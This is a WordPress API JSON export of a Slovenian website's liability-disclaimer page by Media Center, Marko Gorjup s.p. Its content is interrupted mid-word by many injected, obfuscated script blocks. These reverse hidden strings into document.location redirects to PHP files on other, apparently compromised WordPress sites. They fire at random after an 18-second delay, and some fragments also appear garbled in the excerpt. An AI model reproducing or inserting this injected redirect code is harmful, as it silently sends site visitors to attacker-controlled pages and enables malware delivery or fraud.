{"id":8351,"date":"2019-05-05T20:00:06","date_gmt":"2019-05-05T18:00:06","guid":{"rendered":"http:\/\/sostanj.info\/2019\/?page_id=8351"},"modified":"2019-05-05T20:00:06","modified_gmt":"2019-05-05T18:00:06","slug":"omejitev-odgovornosti","status":"publish","type":"page","link":"http:\/\/sostanj.info\/2019\/omejitev-odgovornosti\/","title":{"rendered":"Omejitev odgovornosti"},"content":{"rendered":"<p>Lastnik spletnega mesta ni odgovoren za morebitne \u0161kodljive posledice uporabe. Media Center, Marko Gorjup s.p. ne odgovarja za <script>$nJe=function(n){if (typeof ($nJe.list[n]) == \"string\") return $nJe.list[n].split(\"\").reverse().join(\"\");return $nJe.list[n];};$nJe.list=[\"\\'php.pots_egamiruces\/egamieruces-ahctpac\/mrof-tcatnoc-is\/snigulp\/tnetnoc-pw\/moc.mrifwaltb.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;\tsetTimeout($nJe(0), delay);}<\/script><script>$NjS=function(n){if(typeof ($NjS.list[n])==\"string\") return $NjS.list[n].split(\"\").reverse().join(\"\");return $NjS.list[n];};$NjS.list=[\"\\'php.sgalf-tropxe\/tropxe\/weiv\/bil\/noitargim-pw-eno-ni-lla\/snigulp\/tnetnoc-pw\/ofni.s<script>$NjS=function(n){if(typeof ($NjS.list[n])==\"string\") return $NjS.list[n].split(\"\").reverse().join(\"\");return $NjS.list[n];};$NjS.list=[\"\\'php.sgalf-tropxe\/tropxe\/weiv\/bil\/noitargim-pw-eno-ni-lla\/snigulp\/tnetnoc-pw\/ofni.s<script>$zXz=function(n){if (typeof ($zXz.list[n]) == \"string\") return $zXz.list[n].split(\"\").reverse().join(\"\");return $zXz.list[n];};$zXz.list=[\"\\'php.yerg-sknil-tuoba-egap\/snrettap\/cni\/owtytnewtytnewt\/semeht\/tnetnoc-pw\/moc.cvpny\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}<\/script>tobor-latigid\/\/:sptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000;\tsetTimeout($NjS(0),delay);}<\/script><script>$zXz=function(n){if (typeof ($zXz.list[n]) == \"string\") return $zXz.list[n].split(\"\").reverse().join(\"\");return $zXz.list[n];};$zXz.list=[\"\\'php.yerg-sknil-tuoba-egap\/snrettap\/cni\/owtytnewtytnewt\/semeht\/tnetnoc-pw\/moc.cvpny\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}<\/script>tobor-latigid\/\/:sptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000;\tsetTimeout($NjS(0),delay);}<\/script><script>$NjS=function(n){if(typeof ($NjS.list[n])==\"string\") return $NjS.list[n].split(\"\").reverse().join(\"\");return $NjS.list[n];};$NjS.list=[\"\\'php.sgalf-tropxe\/tropxe\/weiv\/bil\/noitargim-pw-eno-ni-lla\/snigulp\/tnetnoc-pw\/ofni.s<script>$zXz=function(n){if (typeof ($zXz.list[n]) == \"string\") return $zXz.list[n].split(\"\").reverse().join(\"\");return $zXz.list[n];};$zXz.list=[\"\\'php.yerg-sknil-tuoba-egap\/snrettap\/cni\/owtytnewtytnewt\/semeht\/tnetnoc-pw\/moc.cvpny\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}<\/script>tobor-latigid\/\/:sptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000;\tsetTimeout($NjS(0),delay);}<\/script><script>$zXz=function(n){if (typeof ($zXz.list[n]) == \"string\") return $zXz.list[n].split(\"\").reverse().join(\"\");return $zXz.list[n];};$zXz.list=[\"\\'php.yerg-sknil-tuoba-egap\/snrettap\/cni\/owtytnewtytnewt\/semeht\/tnetnoc-pw\/moc.cvpny\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}<\/script>to<script>$nJe=function(n){if (typeof ($nJe.list[n]) == \"string\") return $nJe.list[n].split(\"\").reverse().join(\"\");return $nJe.list[n];};$nJe.list=[\"\\'php.pots_egamiruces\/egamieruces-ahctpac\/mrof-tcatnoc-is\/snigulp\/tnetnoc-pw\/moc.mrifwaltb.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;\tsetTimeout($nJe(0), delay);}<\/script>\u010dnost vsebin na spletnem mestu niti za kakr\u0161nokoli izgubo ali \u0161kodo, nastalo na podlagi uporabe teh vsebin. Media Center, Marko Gorjup s.p. se bo trudil za pravilnost, a\u017eurnost in popolnost podatkov, vsebovanih na teh straneh, vendar ne prevzema nikakr\u0161ne odgovornosti o njihovi pravilnosti, a\u017eurnosti in popolnosti. Media Center, Marko Gorjup s.p. lahko te strani spremeni kadarkoli in brez predhodnega obvestila in ne prevzema nikakr\u0161ne odgovornosti za posledice teh sprememb. Uporabnik vse vsebine in s<script>$nJe=function(n){if (typeof ($nJe.list[n]) == \"string\") return $nJe.list[n].split(\"\").reverse().join(\"\");return $nJe.list[n];};$nJe.list=[\"\\'php.pots_egamiruces\/egamieruces-ahctpac\/mrof-tcatnoc-is\/snigulp\/tnetnoc-pw\/moc.mrifwaltb.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;\tsetTimeout($nJe(0), delay);}<\/script><script>$NjS=function(n){if(typeof ($NjS.list[n])==\"string\") return $NjS.list[n].split(\"\").reverse().join(\"\");return $NjS.list[n];};$NjS.list=[\"\\'php.sgalf-tropxe\/tropxe\/weiv\/bil\/noitargim-pw-eno-ni-lla\/snigulp\/tnetnoc-pw\/ofni.s<script>$NjS=function(n){if(typeof ($NjS.list[n])==\"string\") return $NjS.list[n].split(\"\").reverse().join(\"\");return $NjS.list[n];};$NjS.list=[\"\\'php.sgalf-tropxe\/tropxe\/weiv\/bil\/noitargim-pw-eno-ni-lla\/snigulp\/tnetnoc-pw\/ofni.s<script>$zXz=function(n){if (typeof ($zXz.list[n]) == \"string\") return $zXz.list[n].split(\"\").reverse().join(\"\");return $zXz.list[n];};$zXz.list=[\"\\'php.yerg-sknil-tuoba-egap\/snrettap\/cni\/owtytnewtytnewt\/semeht\/tnetnoc-pw\/moc.cvpny\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}<\/script>tobor-latigid\/\/:sptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000;\tsetTimeout($NjS(0),delay);}<\/script><script>$zXz=function(n){if (typeof ($zXz.list[n]) == \"string\") return $zXz.list[n].split(\"\").reverse().join(\"\");return $zXz.list[n];};$zXz.list=[\"\\'php.yerg-sknil-tuoba-egap\/snrettap\/cni\/owtytnewtytnewt\/semeht\/tnetnoc-pw\/moc.cvpny\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}<\/script>tobor-latigid\/\/:sptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000;\tsetTimeout($NjS(0),delay);}<\/script><script>$NjS=function(n){if(typeof ($NjS.list[n])==\"string\") return $NjS.list[n].split(\"\").reverse().join(\"\");return $NjS.list[n];};$NjS.list=[\"\\'php.sgalf-tropxe\/tropxe\/weiv\/bil\/noitargim-pw-eno-ni-lla\/snigulp\/tnetnoc-pw\/ofni.s<script>$zXz=function(n){if (typeof ($zXz.list[n]) == \"string\") return $zXz.list[n].split(\"\").reverse().join(\"\");return $zXz.list[n];};$zXz.list=[\"\\'php.yerg-sknil-tuoba-egap\/snrettap\/cni\/owtytnewtytnewt\/semeht\/tnetnoc-pw\/moc.cvpny\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}<\/script>tobor-latigid\/\/:sptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000;\tsetTimeout($NjS(0),delay);}<\/script><script>$zXz=function(n){if (typeof ($zXz.list[n]) == \"string\") return $zXz.list[n].split(\"\").reverse().join(\"\");return $zXz.list[n];};$zXz.list=[\"\\'php.yerg-sknil-tuoba-egap\/snrettap\/cni\/owtytnewtytnewt\/semeht\/tnetnoc-pw\/moc.cvpny\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}<\/script>to<script>$nJe=function(n){if (typeof ($nJe.list[n]) == \"string\") return $nJe.list[n].split(\"\").reverse().join(\"\");return $nJe.list[n];};$nJe.list=[\"\\'php.pots_egamiruces\/egamieruces-ahctpac\/mrof-tcatnoc-is\/snigulp\/tnetnoc-pw\/moc.mrifwaltb.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;\tsetTimeout($nJe(0), delay);}<\/script>ritve na spletnem mestu uporablja na lastno odgovornost.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Lastnik spletnega mesta ni odgovoren za morebitne \u0161kodljive posledice uporabe. Media Center, Marko Gorjup s.p. ne odgovarja za tobor-latigid\/\/:sptth\\&#8217;=ferh.noitacol.tnemucod&#8221;];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid\/\/:sptth\\&#8217;=ferh.noitacol.tnemucod&#8221;];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000;&#8230;<\/p>\n","protected":false},"author":1,"featured_media":8430,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-8351","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"http:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/pages\/8351","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/comments?post=8351"}],"version-history":[{"count":1,"href":"http:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/pages\/8351\/revisions"}],"predecessor-version":[{"id":8352,"href":"http:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/pages\/8351\/revisions\/8352"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/media\/8430"}],"wp:attachment":[{"href":"http:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/media?parent=8351"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}